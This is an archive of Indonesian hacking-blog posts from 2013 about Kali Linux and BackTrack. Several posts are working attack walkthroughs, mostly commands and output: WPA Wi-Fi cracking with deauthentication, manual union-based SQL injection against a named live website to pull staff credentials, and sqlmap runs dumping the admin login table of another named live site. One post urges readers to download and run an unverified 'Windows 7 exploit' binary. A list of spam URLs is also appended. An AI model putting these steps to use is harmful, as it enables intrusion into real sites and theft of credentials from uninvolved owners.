468x60 ads

Backtrack berevolusi menjadi KALI LINUX

Kalian sudah pada tau belom kalo Backtrack Releas ke 6 berganti lable name menjadi KALI LINUX, aneh si bagi orang indonesia karna KALI jauh dari image Penetrasi

Belajar Opensive Scurity Yuk.

” The Quieter you become, the more you are able to hear….. “

Black KALI LINUX

BELAJAR LINUX.blogspot.com info seputar LINUX, BACKTRACK,DAN HACKING TUTORIAL

BELAJAR LINUX4

BELAJAR LINUX4.

BELAJAR LINUX5

BELAJAR LINUX5.

Tuesday, 30 April 2013

UPDATE REPOSITORY KALI LINUX

di BELAJAR LINUX ~ kali ini mau bagi list update repo untuk Kali linux ( UPDATE REPOSITORY KALI LINUX ) langsung aja yah gak pakek Lama nih :

root@kali:~# cat /etc/apt/source.list
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Feel free to share it ;)

jika ada updatan untuk pisting " UPDATE REPOSITORY KALI LINUX  " akan segera di tambah lagi see u.

Monday, 29 April 2013

Cara Hack Wifi | kali linux

Tutorial ini ( Cara Hack Wifi | kali linux ) menjelaskan bagaimana cara mendapatkan password WiFi. dengan hack atau crack password wifi menggunakan BACKTRACK / KALI LINUX
Note:
Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.
Preparation:
1. Aircrack, bisa di dapatkan di sini
2. Dictionary attack
Briefing
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover

Walkthrough

1. Hentikan semua proses yang menghambat jalannya aireplay

code:
root@gold:/# airmon-ng check kill

2. Buat interface baru dengan mode monitor menggunakan airmon-ng

code:
root@gold:/# airmon-ng start wlan0

3. Monitoring setiap akses poin yang ada di sekitar attacker

code:
root@gold:/# airodump-ng mon0
4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump.
code:
root@red-dragon:/# airodump-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0


Keterangan:
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin


5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake


code:
root@gold:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0


Keterangan:
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien


Note:
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
code:
root@gold:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0


6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng.
code:
root@gold:/# aircrack-ng output-01.cap -w /root/crack wpa.txt

Keterangan
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini dengan cara mengkonekan dengan wifi kita =)

Jika ada yang mau konsultasi bisa temui saya kita buat event di daerah Gading Serpong Tangerang Lokasi yang dekat dengan rumah dan banyak tempat jajanan serta WIFI sebagai bahan percobaan.

sekian dulu tutorial | Cara Hack Wifi | kali linux

Monday, 22 April 2013

Install flash player di chromium kali linux

Jadi, sobat belajar linux yang baru install backtrack atau kali linux tidak memiliki Flash Player untuk chormium-browser? Kemudian Anda datang ke tempat yang tepat. Aku akan memberitahu Anda bagaimana untuk menginstal Flash Player untuk kromium-browser., simple kok cukup lakukan langkah ini :


1. Download Flash Player from here " http://get.adobe.com/flashplayer/" copy ke toolbar kamu tanpa tanda kutip dan. Download .tar.gz extension one.
2. Open terminal, and do following command:
Command :
[~] → cd Downloads

Command :
[~/Downloads] → tar -xf install_flash_player

Command :
[~/Downloads] → cp libflashplayer.so /usr/lib/chromium/plugins
And do restart your chromium-browser.
 
Semoga bermanfaat ;
GOLDSPLOIT

Friday, 19 April 2013

nmap error install NMAP 6.25-1

Belajar Linux - kalo nmap kamu masih nmap bawaan backtrack ataupun kali linux dan kadang kamu masih aja ngerasa kurang puas maka kamu bisa menginstall nmap versi 6.25-1 dengan cara manual. Yaitu dengan cara mendownload source code nya, kemudian compile sourcenya, dan terakhir menginstallnya. Tapi saya memiliki versi debian package, jadi kalian tidak perlu repot repot melakukan install manual.

1. Download debian packagenya
Command :
[~]  wget http://t193r.googlecode.com/files/nmap_6.25-1_i386.deb
2. Install dengan dpkg
Command :
[~]  dpkg -i nmap_6.25-1_i386.deb
3. Cek versi nmap dengan perintah
Command :
[~]  nmap -V


BY : Goldsploit
coursey by : lets kicking ass

Tuesday, 16 April 2013

MULAI BELAJAR LINUX DARIMANA

Sekitar 2 tahun lalu saya memutuskan untuk mempelajari system operasi lain selain windows dan saya tertarik sekali oleh LINUX dengan banyak varian distro, akhirnya untuk memulai semuanya saya memilih UBUNTU. Yap wahtu itu ubuntu masih 10.04 . awalnya coba2 install di CPU rumah. berhasil, dan masih bingung, mau di apain , memang sih banyak yang udah ngerti linux, tp kalo cpu nya aja di rumah gmana mau di ajarin, akhirnya ngoprek2, beli UBUNTU 10.10 versi DVD di glodog, dan taraaaaa... KERNEL PANIC" gak bisa di install Linux apapun lg PC gw..

Hening...

beberapa bulan kemudian gw di beliin laptop sama bokap gw, dengan spek yg lumayan i3 , gw langsung installin ubuntu, dan taraaaaaa,,,, BLANK..!! ada virus nya dari hasil donlot iso copyan dari temen, HAASSUUUU..
Tp ga sampe situ gw pun install ulang win 7 gw dulu, kemudian gw ketemu temen2 yg suka linux, lalu gw memutuskan install backtrack, waktu itu dah ada BT 5 R1, dan berkat temen2 gw itu gw berhasil dan ngerti se enggaknya nginstall os, berlanjut apa aja yg harus di install setelah install os, seperti WIFI, VGA , Dll ..

Mulai terbiasa sama Backtrack, gw mulai belajar penetration sama temen2 gw itu, yang akhirnya memutuskan untuk berbagi dengan cara membentuk komunitas team, w sendiri suka pemprograman php yang notaben nya adalah WEB BASIC Programming.. dan tools paling gw suka dari BT itu Metatsploit dan sqlmap, dan banyak lagi

T193r team adalah nama team / communitas, kini tiger team sudah menghasilkan banyak kreasi untuk LINUX, dan bebearpa waktu ini backtrack yg menjadi pegangan kami mengeluarkan anak baru nya yaitu KALI LINUX, dan kamipun migrasi walaupun ttp ga ninggalin Backtrack, Over All thx buat temen2 linux,

thank's :

red-dragon, blusploit, monster, violet, bob, 3ko, Toba, dan seluruh anak t193r team

Monday, 15 April 2013

Belajar Exploit windows 7 Menggunakan Kali Linux

Belajar Linux ingin berbagi  Berita bagus! dapat di gunakan di platform linux apapun bukan hanya menggunakan kali linux, yap,  Setelah 3 bulan meneliti, tim kami telah menemukan kerentanan kritis yang ditemukan pada Windows 7 dan Windows 8 yang dapat digunakan untuk melakukan exploit. Shellcode ini bekerja pada APAPUN arsitektur windows 7, dan seri apapun! Kita mulai dari pemrograman C, kemudian kompilasi script ini sebagai file biner, sehingga Anda tidak perlu melakukan kompilasi lagi. Hanya mengubah file ini untuk executeable menggunakan chmod. Kemudian jalankan. Berikut ini beberapa output.


Just download this binary backtrackers on
1. Here is for amd64 link
2. Here is for i386 link

md5sum: amd64 78a18e3d90ee12ed55e38ffe784a85e8
md5sum: i386 06b858cc8982cda719a59627d37bd1e6

Important:
In order to execute this binary file, you need an internet access to checking md5sum. So your md5sum won't miss match.

NOTE: If you found that md5sum is miss match, don't execute that file. Because, it's probably a malicious code

Team:
red-dragon
blusp10it
tobapramudia





Sunday, 14 April 2013

Cara Install NVIDIA pada KALI LINUX

agan agan belajar linux kali ini mau sharing Langkah - langkah menginstal VGA NVIDIA DRIVER pada KALI LINUX

1. Add Kali Linux Repositories yaitu menambahkan repo kali linux dengan cara buka terminal lalu ketik kan command di bawah ini ..
Command :
goldsploit [~]  echo "deb http://http.kali.org/kali kali main non-free contrib" > /etc/apt/source.list
Command :

[~]  echo "deb-src http://http.kali.org/kali kali main non-free contrib" >> /etc/apt/source.list
Command :
[~]  echo "deb http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/source.list
2. Update your repositories
Command :
[~]  apt-get update
3. Install Kernel Header
Command :
[~]  apt-get install linux-header-$(uname -r)
download dulu driver versi terakhirnya NVIDIA driver di cobabelajarlinux NVDIA DOWNLOAD. Save it anywhere, example on /root/ directory.
4. Disable nouveau driver
Command :
[~]  sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
5. Update grub
Command :
[~]  update-grub
6. Reboot
Command :
[~]  reboot
7. On GRUB Loader, choose Kali Linux OS
8. If you see GDM3 on startup, press CRTL+ALT+F1 to load tty0
9. Login as root
10. Stop gdm3 service
Command :
[~]  service gdm3 stop
11. Install NVIDIA driver
Command :
[~]  chmod +x NVIDIA-Linux* ; ./NVIDIA-Linux*
NOTE:
Make sure you have download correct NVIDIA driver, check your architecture first before download your driver!
12. Start GDM3 service
Command :
[~]  service gdm3 start
13. If you see NVIDIA flash screen, then you are done!

Di tulis ulang oleh : Goldsploit T193r --team

Wednesday, 10 April 2013

BackTrack 0day eskalasi Privillage

Kemarin, Belajar Linux ( lagi gak ngebahas sqlmap ataupun sql injection) tapi saya melihat laporan bug di forum BackTrack saya menggambarkan sebuah "0-Day privilage eskalasi di BackTrack" dari Infosec Institute.



 
Awalnya, saya bingung laporan bug sebagai BackTrack 5 R2 secara default memiliki user root tunggal, tanpa terbuka TCP atau UDP - karena konsol eskalasi dari akar ke akar tampak sembrono. Judul bug bahkan lebih membingungkan - menyebutnya sebagai "BackTrack 0day" memberitahukan bug, tampaknya dalam upaya untuk membuatnya tampak lebih besar dari itu.

Sebagai sebuah organisasi yang mengklaim dirinya sebagai profesional keamanan, Infosec Institute seharusnya tahu lebih baik. Mereka harus tahu bahwa deskripsi kerentanan akurat mungkin adalah aspek yang paling penting dari sebuah laporan bug. Tanpa aturan dasar di tempat, setiap satu 3'rd partai FTP overflow dalam jendela akan dikategorikan sebagai "Windows 0day", dan setiap kerentanan aplikasi web PHP akan didefinisikan sebagai "Apache 0day".

Untuk meringkas, kami percaya bahwa dengan sengaja melakukan misrepresentasi ini laporan bug telah didiskreditkan BackTrack unecessarily di mata orang-orang yang tidak memahami mekanisme yang mendasari OS kita, dan juga mendiskreditkan Infosec Institute di mata mereka yang melakukannya.

Terakhir, kami menemukan kutipan berikut dari Saul Bellow relevan dengan situasi ini. "Banyak kecerdasan dapat diinvestasikan dalam ketidaktahuan ketika kebutuhan untuk ilusi yang mendalam".

Tuesday, 9 April 2013

kali linux release sqlmap

KALI LINUX telah release - Tujuh tahun mengembangkan BackTrack dengan beragam tool's hacking seperti sqlmap untuk melakukan sql injection dengan cepat dan macam - macam tools- tools hacking lainnya  Linux telah mengajarkan kita sejumlah besar tentang apa yang kita, dan komunitas keamanan, pikirkan distribusi pengujian penetrasi akan terlihat seperti. Kami telah mengambil semua pengetahuan dan pengalaman dan diimplementasikan dalam "generasi berikutnya" distribusi pengujian penetrasi.

Setelah setahun pembangunan diam, kami sangat bangga untuk mengumumkan rilis dan ketersediaan publik "Kali Linux", yang paling canggih, kuat, dan stabil penetrasi distribusi pengujian sampai saat ini.

Kali adalah versi lebih matang, aman, dan perusahaan-siap dari BackTrack Linux. Mencoba untuk daftar semua fitur baru dan kemungkinan yang sekarang tersedia di Kali akan menjadi tugas yang mustahil. Oleh karena itu kami mengundang Anda untuk mengunjungi blog kami,  Dokumentasi Linux untuk mengalami kebaikan Kali untuk diri sendiri.

Kami sangat gembira tentang masa depan distribusi dan kita tidak bisa menunggu untuk melihat apa yang masyarakat akan lakukan dengan BackTrack Kali. Daftar di Kali baru Forum dan bergabung dengan kami di IRC di # Kali-linux di irc.freenode.net dan membantu kami mengantar era baru ini.

Monday, 8 April 2013

Langkah langkah menggunakan sql injection

Dork : "inurl:content.php?id=" site:info, Di posting yang ke 20 ini BELAJAR LINUX lagi - lagi membuat threat SQL INJECTION, untuk kamu yang masih blom pakek backtrack linux, hmmmm.. sengasara juga kalo ga ada sqlmap tuh mau gak mau harus manual, oia lanjut lagi tutornya
Untuk Dork masih banyak yang lain, dan akan ada di postingan berikutnya :D
Untuk target kali ini >> http://www.mirbg.info/content.php?id=23

Tambah string ' (tanda kutip ganda) di akhir Url, jika vuln maka akan ada tulisan seperti ini Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in/home/mirbg/public_html/content.php on line 9


http://www.mirbg.info/content.php?id=23'



Lakukan perintah order by sampai pesan eror muncul lagi


http://www.mirbg.info/content.php?id=23 order by 1-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 2-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 3-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)


Kesimpulannya kita mengambil yang 3 atau table nya berjumlah 3 :D
Selanjutnya lakukan dengan perintah union all select
http://www.mirbg.info/content.php?id=-23 union all select 1,2,3--
Lihat angka berapa yang kita dapat =))


Kebetulan muncul angka 2 mas broo,.. ayo lanjutkan !!
Next... kita musti mengetahui versi web tersebut,. dengan perintah version() atau @@version http://www.mirbg.info/content.php?id=-23 union all select 1,version(),3--

Keterangan : kita bisa lanjutkan tutorial ini jika target web versi 5.1.56-log, kalu versi 4 main tebak-tebakan =)) kwkwkwkwkw, bagi yang mau boleh aja..
ok next..
Mencari table dengan perintah table_name dan di akhir url tambah from information_schema.tables--

http://www.mirbg.info/content.php?id=-23 union all select 1,table_name,3 from information_schema.tables--

Lanjut,..
dengan perintah group_concat dan di akhir url tambah ini where table_schema=database()--
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--




Ok, kita mendapatkan banyak table =))
TBL_TEXTS_SEQ,tbl_articles,tbl_content,tbl_form1,tbl_form2,
tbl_languages,tbl_staff,tbl_staff_sessions,tbl_texts,tbl_words

kita buka table yang penting-penting saja (biasanya untuk login)
Sebelum meng inject anda harus menubah table tersebut ke hexa decimal
contoh kita mengambil tbl_staff dan hexadecimalnya adalah 74626c5f7374616666
Jadi >>
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x74626c5f7374616666--

Liat apa yang anda dapat =))
isi dari tbl_staff
s_id,s_name,s_login,s_pass,s_admin,s_id,s_name,s_login,s_pass,s_admin

Lihat isi column dengan perintah concat_ws(table_yang_berisi_user_dan_pass)
di akhir url from nama_table_berasal--
http://www.mirbg.info/content.php?id=-23 union all select 1,concat_ws(0x3a,s_login,0x3a,s_pass),3 from tbl_staff
Lihat dan nikmati apa yang kamu dapatkan, :D
Lanjutkan dengan mencari login page
http://www.mirbg.info/admin/index.php
dan untuk password admin, biasanya harus di deckrypt dulu di MD5 Decrypter

Keterangan :
MD5 Decrypter --> http://www.md5decrypter.co.uk/
Converter string to Hexa ---> http://www.string-functions.com/string-hex.aspx

Maaf kalu berantakan :P soalnya kalo di rapihin nanti bingung bacanya karna ini tutorial ok's : GOLDSPLOIT

Sumber:
http://lutfiyu.egloos.com/6732191
http://flgclassifieds.cce.cornell.edu/author/lutfiyu04/
https://www.clingendael.org/publication/comitology-and-regulatory-burdens-blind-spot?page=14#comment-127326
https://about.me/paramountland/edit
https://www.producthunt.com/@paramount_lakes
https://kalsuscop.blogspot.com/
https://sway-beach.blogspot.com/
https://d2the4thpower.blogspot.com/
https://addons.mozilla.org/en-US/firefox/user/14491358/
https://site-3610956-4446-4526.mystrikingly.com/
https://www.htgifa.hindustantimes.com/forum/httpshealthcounterprocomketovatru-za-au/1727/
https://salme.jalisco.gob.mx/prensa/noticia/1768?page=30#comment-1159389
https://challenges.openideo.com/blog/virtual-teams-the-lowdown/comments#c-8d69cc2eacde74a16e8b6a12de512968
https://fjb.kaskus.co.id/product/5ff3dd032525c378424ce0fc/perumahan-cluster-furnished-zuma--malibu-village-tinggal-bawa-koper






Sumber : http://www.setandarisurga.com

Sunday, 7 April 2013

menggunakan SQLMAP KALI LINUX

kembali lagi di belajar linux -  Kali ini saya mau memberikan informasi soal anak baru "KALI LINUX" , kemarin hari sabru tepatnya tgl 6 april saya akhirnya menginstall kali linux yang menjadi pendamping backtrack, wow tidak ada folder pentest


ok langsung aja ke topic pembicaraan, dulu waktu pakek backtrack kalo mau pakek sqlmap , saya harus pindah ke directory tempat adanya sqlmap yakni di # folder /pentest/ bla bla blah ..
namun pada kali linux, tidak perlu melakukan itu, anda dapat memanggil sqlmap langsung dimanapun anda berada, di root, atau di manapun, langsung saja ketik sqlmap ,,

cara menggunakan sqlmap masih sama kok seperti di backtrack dapat di pelajari di tutor ini :
bagaimana cara menggunakan sqlmap ?


author : goldsploit

Friday, 5 April 2013

Cara Injection SQL menggunakan sqlmap Final level 4

Kembali lagi di BELAJAR LINUX melakukan sql injection dengan perintah (select group_concat(table_name) from information schema.tables where table_schema=database()) sangat membosankan, mari kita coba trik lain dengan menggunakan sqlmap

Kali ini saya akan memberikan sedikit pelajaran mengenai SQL Injection level 4. Pada tutorial kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware.

Preparation :

Firefox
Tamper Data (add ons mozilla firefox)
SQLmap

Walkthrough

1. Menguji vulnerability.


Kali ini, vmware saya telah berjalan dan memiliki ip address 172.16.33.131. Saya buka firefox, kemudian saya masukan IP address 172.16.33.131 pada address bar.






Username : admin
Password : admin


Log In... Kemudian...





Kita berada di halaman checklogin.php. Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login.


Username : admin
Password : '


Log In.. Kemudian...





Kelihatannya website ini vulnerable. Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan tamper data.


2. Tamper Data In Action


Jika anda belum memiliki tamper data, anda bisa install di sini. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.


Setelah menginstall, tamper data dapat diaktifkan di Tools - Tamper Data



Kembali ke halaman login

Username : admin
Password : 123

Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.





OK. Saya temukan POSTDATA=myusername=admin&mypassword=123&Submit=Login. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan. Sebelumnya saya ucapkan terima kasih pada tamper data. =)


3. SQLmap in Attack


Command :
goldsploit#~ [~] >> cd /pentest/database/sqlmap/


Command :
goldsploit#~: [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --flush-session


Keterangan:

-u = url [Pesan error muncul pada halaman checklogin.php]
--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]
-p = parameter [Parameter yang vulnerable adalah mypassword
--flush-session = Bagian ini tidak masalah jika tidak disertakan.



Muncul pertanyaan:
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Kemudian muncul lagi:
sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

dan berujung pada CRITICAL:
[CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details





4. Game Over
Saya coba naikan level dan risk pada testing SQLmap menjadi 5.


Command :
goldsploit#~: [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5



Kemudian muncul lagi:
sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]


Saya tekan "n" [tanpa tanda kutip], kemudian "enter"


Dan muncul pesan yang membahagiakan:
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N]


Saya jawab "n", kemudian "enter".


Dan payload untuk website ini adalah:


Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: POSTDATA=myusername=admin&mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&Submit=Login


Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: POSTDATA=myusername=admin&mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&Submit=Login





Sempurna....

penulis ulang : goldsploit
created by : red-dragon

Originaly Created By Double Dragon
TUTORIAL INI DI AMBIL DARI double-dragon.blogspot.com

Thursday, 4 April 2013

bagaimana cara menggunakan sqlmap

Tutorial sqlmap

Kali ini saya ingin bahas tentang penggunaan dasar salah satu SQL Injection tools dari platform linux. Sistem operasi yang saya gunakan yaitu Backtrack 5 R1 turunan dari ubuntu 10.04. Saya ingin bahas tentang sqlmap. Sedikit pengertian tentang sqlmap menurut saya, sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.
Tulisan ini dibuat dengan tujuan pembelajaran, gunakan dengan pertanggung jawaban sendiri. Ok, saya akan coba melakukan penetrasi secara acak, dan saya dapat target http://www.yourparttime.com/ dengan vulnerability di http://www.yourparttime.com/view-jobinfo.php?id=2097′
catatan:
1 --threads : max number sqlmap untuk membuka concurrent dari koneksi http
2 --random-agent : load random user agent dari default sqlmap,
Untuk penggunaan standar nya
root@goldsploit#~:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump –dumpall
Pertama kita akan memfatach banner mysql
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --banner
fatch ini berfungsi untuk mendapatkan route dari web target sehingga akan lebih mudah sqlmap untuk mengeksplorasi. Lalu saya akan analisis fatch tersebut dengan perintah
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --current-user -currrent-db
Selanjutnya saya akan memfatch user dan db yang digunakan dengan flag
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --dbs
didapat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:13:12] [INFO] fetching database names
[17:13:12] [INFO] the SQL query used returns 4 entries
[17:13:12] [INFO] starting 4 threads
[17:13:13] [INFO] retrieved: ypt_v2
[17:13:13] [INFO] retrieved: test
[17:13:13] [INFO] retrieved: ypt_db
[17:13:13] [INFO] retrieved: information_schema
available databases [4]:
[*] information_schema
[*] test
[*] ypt_db
[*] ypt_v2
[17:13:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
[*] shutting down at 17:13:13
Terlihat database yang digunakan target. Saya akan mengambil salah satu yaitu database ypt_v2. Sekarang kita eksplorasi table dari database ypt_v2
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 --tables
dan saya mendapatkan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
Database: ypt_v2
 
[71 tables]
 
+-----------------------+
 
| a_email_alert |
 
| a_sms_alert |
 
| ad_setting |
 
| admin_login |
 
| admin_login_log |
 
| agent |
 
| agent_inquiry |
 
| agent_promo |
 
| aging |
 
| apply_job |
 
| article |
 
| book |
 
| cc_info |
 
| cc_post_process |
 
| cc_pre_process |
 
| company_industry |
 
| company_logo |
 
| company_view |
 
| credit_history |
 
| credit_manage |
 
| data_capture |
 
| data_employer |
 
| data_history |
 
| data_publisher |
 
| email_alert |
 
| email_alert_temp |
 
| employee |
 
| employee_rate |
 
| employer |
 
| employer_rate |
 
| footer_ad |
 
| jane_ads |
 
| jane_payout |
 
| jane_report |
 
| job_category |
 
| job_title |
 
| launch |
 
| launch_sponsor |
 
| matching_job |
 
| matching_log |
 
| meet |
 
| news |
 
| newsletter |
 
| newsletter_achieve |
 
| payment |
 
| payment_log |
 
| polling_1 |
 
| post_ad |
 
| post_job |
 
| post_job_bak |
 
| post_job_history |
 
| pr_form |
 
| promo_history |
 
| promotion |
 
| publishers |
 
| search_resume |
 
| search_resume_log |
 
| search_shortlist |
 
| search_shortlist_log |
 
| skm |
 
| spec_art |
 
| spec_education |
 
| spec_hotel |
 
| spec_hr |
 
| spec_it |
 
| spec_sale |
 
| spec_service |
 
| temporary_remark |
 
| top_banner |
 
| traceurl |
 
| track_referral_code |
 
+----------------------- +
 
[17:15:26] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
 
[*] shutting down at 17:15:26
<pre>
wah ada 71 table yang kita dapat. Dan terlihat tabel admin_login disana. Saya langsung akan langsung cari kolom di admin_login
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login --columns
dan saya dapatkan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
</pre>
web server operating system: Linux Fedora 9 (Sulphur)
 
web application technology: PHP 5.2.6, Apache 2.2.8
 
back-end DBMS: MySQL 5.0
 
[17:19:13] [INFO] fetching columns for table 'admin_login' on database 'ypt_v2'
 
[17:19:14] [INFO] the SQL query used returns 4 entries
 
[17:19:14] [INFO] starting 4 threads
 
[17:19:14] [INFO] retrieved: admin_password
 
[17:19:15] [INFO] retrieved: admin_userid
 
[17:19:15] [INFO] retrieved: admin_name
 
[17:19:15] [INFO] retrieved: admin_id
 
[17:19:15] [INFO] retrieved: varchar(200)
 
[17:19:15] [INFO] retrieved: varchar(200)
 
[17:19:15] [INFO] retrieved: int(11)
 
[17:19:15] [INFO] retrieved: varchar(200)
 
Database: ypt_v2
 
Table: admin_login
 
[4 columns]
 
+--------------------+----------------+
 
| Column | Type |
 
+------------------- +----------------+
 
| admin_id | int(11) |
 
| admin_name | varchar(200) |
 
| admin_password | varchar(200) |
 
| admin_userid | varchar(200) |
 
+--------------------+----------------+
 
[17:19:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
 
[*] shutting down at 17:19:16
<pre>
wah saya mendapatkan admin_id, admin_name, admin_password, dan admin_password. Ok lanjut dapatkan data dari admin_name dan admin_password saja karena yang lainnya tidak kita butuhkan.
1
2
</pre>
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login -C admin_name,admin_password –dump
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
</pre>
web server operating system: Linux Fedora 9 (Sulphur)
 
web application technology: PHP 5.2.6, Apache 2.2.8
 
back-end DBMS: MySQL 5.0
 
do you want sqlmap to consider provided column(s):
 
[1] as LIKE column names (default)
 
[2] as exact column names
 
> 1
 
[17:22:30] [INFO] fetching columns LIKE 'admin_name, admin_password' for table 'admin_login' on database 'ypt_v2'
 
[17:23:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
 
[17:23:01] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
 
[17:23:19] [INFO] the SQL query used returns 2 entries
 
[17:23:19] [INFO] starting 2 threads
 
[17:23:21] [INFO] retrieved: admin_name
 
[17:23:21] [INFO] retrieved: admin_password
 
[17:23:21] [INFO] retrieved: varchar(200)
 
[17:23:21] [INFO] retrieved: varchar(200)
 
[17:23:22] [INFO] fetching column(s) 'admin_name, admin_password' entries for table 'admin_login' on database 'ypt_v2'
 
[17:23:23] [INFO] the SQL query used returns 1 entries
 
[17:23:23] [INFO] retrieved: Administrator
 
